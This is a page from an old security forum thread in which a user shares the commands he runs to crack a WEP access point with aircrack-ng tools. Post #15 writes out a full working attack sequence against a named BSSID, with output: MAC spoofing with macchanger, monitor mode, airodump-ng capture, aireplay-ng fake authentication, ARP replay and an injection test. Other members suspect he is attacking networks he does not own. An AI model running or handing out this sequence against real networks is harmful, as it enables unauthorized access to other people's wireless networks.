Page 2 of 2 FirstFirst 12
Results 11 to 18 of 18

Thread: Photo speaking (ALFA 500MW AWUS036H )!!??

  1. #11
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    I've already PM'd lovena once about that, seems the message didn't get through....
    As did I, but I guess it would have been too much work to simply type out the commands and error messages. As compared to spam 16 different threads and take screenshots of the whole process

    Interesting by the way to see how he switched over to another AP (SAGEM_5B99) with another bssid, different channel and much lower PWR rating just 8 minutes after his initial attempt with Rami'z World. It couldn't be that you are playing with someone else's toys now could it Lovena.2008?
    -Monkeys are like nature's humans.

  2. #12
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by =Tron= View Post
    ....Interesting by the way to see how he switched over to another AP (SAGEM_5B99) with another bssid, different channel and much lower PWR rating just 8 minutes after his initial attempt with Rami'z World. It couldn't be that you are playing with someone else's toys now could it Lovena.2008? ....
    My thoughts exactly bud . Corner fodder anyone, or is a third chance in order?



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #13
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default

    I have the understanding, that you also need another "\" escape character for the space
    as well? am I right?

    aireplay-ng -1 0 -e 'Rxxi\'z\ World' -a 00:xx:C9:xx:CB -h 00:11:22:33:44:55 wlan0
    lovena.2008, Pictures are not search able on a forum please use "COPY and PASTE" of
    both your commands and your results, thank you!

    ««EDocTooR»»

  4. #14
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    I have the understanding, that you also need another "\" escape character for the space
    as well? am I right?
    Actually it shouldn't be included since we use the ' symbols at each end of the AP name. The only reason we need to include one \ is that aireplay-ng otherwise will assume that the name is only Rxxi.
    -Monkeys are like nature's humans.

  5. #15
    Just burned his ISO
    Join Date
    May 2008
    Posts
    20

    Wink

    Great & Thanks for help ««EDocTooR»» It's work fine..

    This right way:
    (( -e Rami\'z\ World ))

    My Command its:

    bt ~ # ifconfig wlan0 down

    bt ~ # macchanger -m 00:11:22:33:44:55 wlan0

    Current MAC: 00:c0:ca:1a:ed:05 (Alfa, Inc.)

    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)

    bt ~ # ifconfig wlan0 up

    bt ~ # airmon-ng start wlan0 11


    Interface Chipset Driver

    wlan0 RTL8187 r8187 (monitor mode enabled)

    bt ~ # airodump-ng --bssid 00:16:B6:C9:0B:CB -c 11 -w new wlan0

    So far everything is fine
    then.. (in new shell - Konsole)

    bt ~ # aireplay-ng -1 0 -e Rami\'z\ World -a 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0

    12:06:02 Waiting for beacon frame (BSSID: 00:16:B6:C9:0B:CB) on channel 11

    12:06:02 Sending Authentication Request (Open System)

    12:06:02 Authentication successful
    12:06:02 Sending Association Request [ACK]
    12:06:02 Association successful :-)

    bt ~ # aireplay-ng -3 -e Rami\'z\ World -b 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0

    12:06:19 Waiting for beacon frame (BSSID: 00:16:B6:C9:0B:CB) on channel 11

    Saving ARP requests in replay_arp-0612-120619.cap
    You should also start airodump-ng to capture replies.

    Read 3205 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

    bt ~ # aireplay-ng -9 -e Rami\'z\ World -b 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0

    12:08:09 Waiting for beacon frame (ESSID: Rami'z World) on channel 11

    Found BSSID "00:16:B6:C9:0B:CB" to given ESSID "Rami'z World".

    12:08:09 Trying broadcast probe requests...
    12:08:09 Injection is working!
    12:08:10 Found 1 AP
    12:08:10 Trying directed probe requests...
    12:08:10 00:16:B6:C9:0B:CB - channel: 11 - 'Rami'z World'
    12:08:15 Ping (min/avg/max): 0.237ms/125.062ms/200.009ms Power:19.76
    12:08:15 25/30: 83%

    bt ~ #


    What is the problem and what i do
    and I am sorry to Overstaying...

  6. #16
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Read 3205 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    There needs to be someone else actually sending the ARP requests for you to be able to intercept them and replay them successfully using this attack. There are different approaches that can be used on a WEP network with no clients currently connected to it.
    -Monkeys are like nature's humans.

  7. #17
    Just burned his ISO
    Join Date
    May 2008
    Posts
    20

    Wink

    Thank you very much for all
    Special thanks to
    -=Xploitz=-

    for this great
    Tutorial

    http://forums.remote-exploit.org/showthread.php?t=7872
    And thanks to this magnificent site & this great CD (Back Track)
    Mission ended in success!!
    Greetings and Good Luck For All


  8. #18
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by lovena.2008 View Post
    ....Mission ended in success!! ....
    I shudder to think what "mission" he/she has accomplished based on these previous posts..... *ugh*



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •